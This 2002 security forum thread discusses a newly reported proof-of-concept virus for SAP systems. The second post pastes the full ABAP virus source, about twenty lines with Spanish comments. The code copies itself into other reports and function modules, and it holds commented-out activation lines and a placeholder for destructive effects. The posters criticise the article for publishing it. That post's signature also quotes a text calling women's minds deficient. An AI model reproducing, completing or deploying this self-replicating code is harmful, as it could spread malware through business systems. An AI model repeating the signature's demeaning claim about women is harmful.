Results 1 to 3 of 3

Thread: Proof of concept.

  1. April 15th, 2002, 07:46 PM #1
    DjM
    DjM is offline
    I'd rather be fishing DjM's Avatar
    Join Date
    Aug 2001
    Location
    The Great White North
    Posts
    1,867

    Post Proof of concept.

    There appears to be a new "Proof-of-Concept" Virus being reported. This may be of interest to those of you who run SAP.

    More info. can be found HERE


    DjM
    Reply With Quote Reply With Quote
  2. April 15th, 2002, 08:11 PM #2
    Tedob1
    Tedob1 is offline
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    This is a pretty ****ed-up article first they issue a chalange:
    --------------
    "What protects our customers is very deep security and very limited
    access to these mission-critical systems. ABAP also requires a skill
    set that goes beyond that of most hackers," said Wall.
    ---------------

    then they lead you to instructions:
    --------------
    REPORT VIRIISOFT. "(C) ViriiWare 2000
    * Primer Virus para SAP versión Listados en 24 L*neas de Código
    * Efectos: Solo se reproduce en reports y funciones.
    * Hay que descomentar las linea para que funcione correctamente.
    TABLES TRDIR. DATA: VIN(72) OCCURS 0, VOUT(72) OCCURS 0. "SAPVirii
    SELECT NAME INTO SY-TNAME FROM TRDIR WHERE UNAM NE 'Virii' AND
    ( SUBC = '1' OR ( SUBC = 'I' AND NAME LIKE 'L____U__' ) ).
    IF TRDIR-SUBC = 'I'. SY-TVAR0 = 'FUNCTION'. ELSE. SY-TVAR0 = 'REPORT'.
    ENDIF. EXIT.
    ENDSELECT. CHECK SY-SUBRC = 0.
    *update trdir set: name = 'Virii', sqlx = ' ' where name = sy-tname.
    READ REPORT SY-TNAME INTO VIN. READ REPORT SY-REPID INTO VOUT.
    LOOP AT VIN INTO SY-ENTRY.
    TRANSLATE SY-ENTRY TO UPPER CASE. SEARCH SY-ENTRY FOR SY-TVAR0.
    CHECK SY-SUBRC = 0 AND SY-ENTRY+0(1) NE '*'.
    LOOP AT VIN INTO SY-ENTRY FROM SY-TABIX.
    TRANSLATE SY-ENTRY USING '.@'. SEARCH SY-ENTRY FOR '@'.
    CHECK SY-SUBRC = 0. SY-WILLI = SY-TABIX + 1. EXIT.
    ENDLOOP. EXIT. ENDLOOP. CHECK SY-SUBRC = 0.
    LOOP AT VOUT INTO SY-ENTRY.
    IF SY-PAGNO = 3. SY-PAGNO = 0. ENDIF.
    SEARCH SY-ENTRY FOR 'SAPVirii'.
    IF SY-SUBRC = 0. SY-PAGNO = SY-PAGNO + 1. ENDIF.
    CHECK SY-PAGNO = 0. DELETE VOUT.
    ENDLOOP. INSERT LINES OF VOUT FROM 1 INTO VIN INDEX SY-WILLI.
    *insert report sy-tname from vin. CLEAR SY. "<---Virii Activo
    *Aqu* va el código de destrucción o efectos del virus. "SAPVirii
    ---------------------

    whos side are these guys on?
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
    Reply With Quote Reply With Quote
  3. April 15th, 2002, 08:21 PM #3
    DjM
    DjM is offline
    I'd rather be fishing DjM's Avatar
    Join Date
    Aug 2001
    Location
    The Great White North
    Posts
    1,867
    --------------
    "What protects our customers is very deep security and very limited
    access to these mission-critical systems. ABAP also requires a skill
    set that goes beyond that of most hackers," said Wall.
    ---------------

    then they lead you to instructions:
    --------------

    Ya, likely not the brightest way to bring this to peoples attention.

    DjM
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules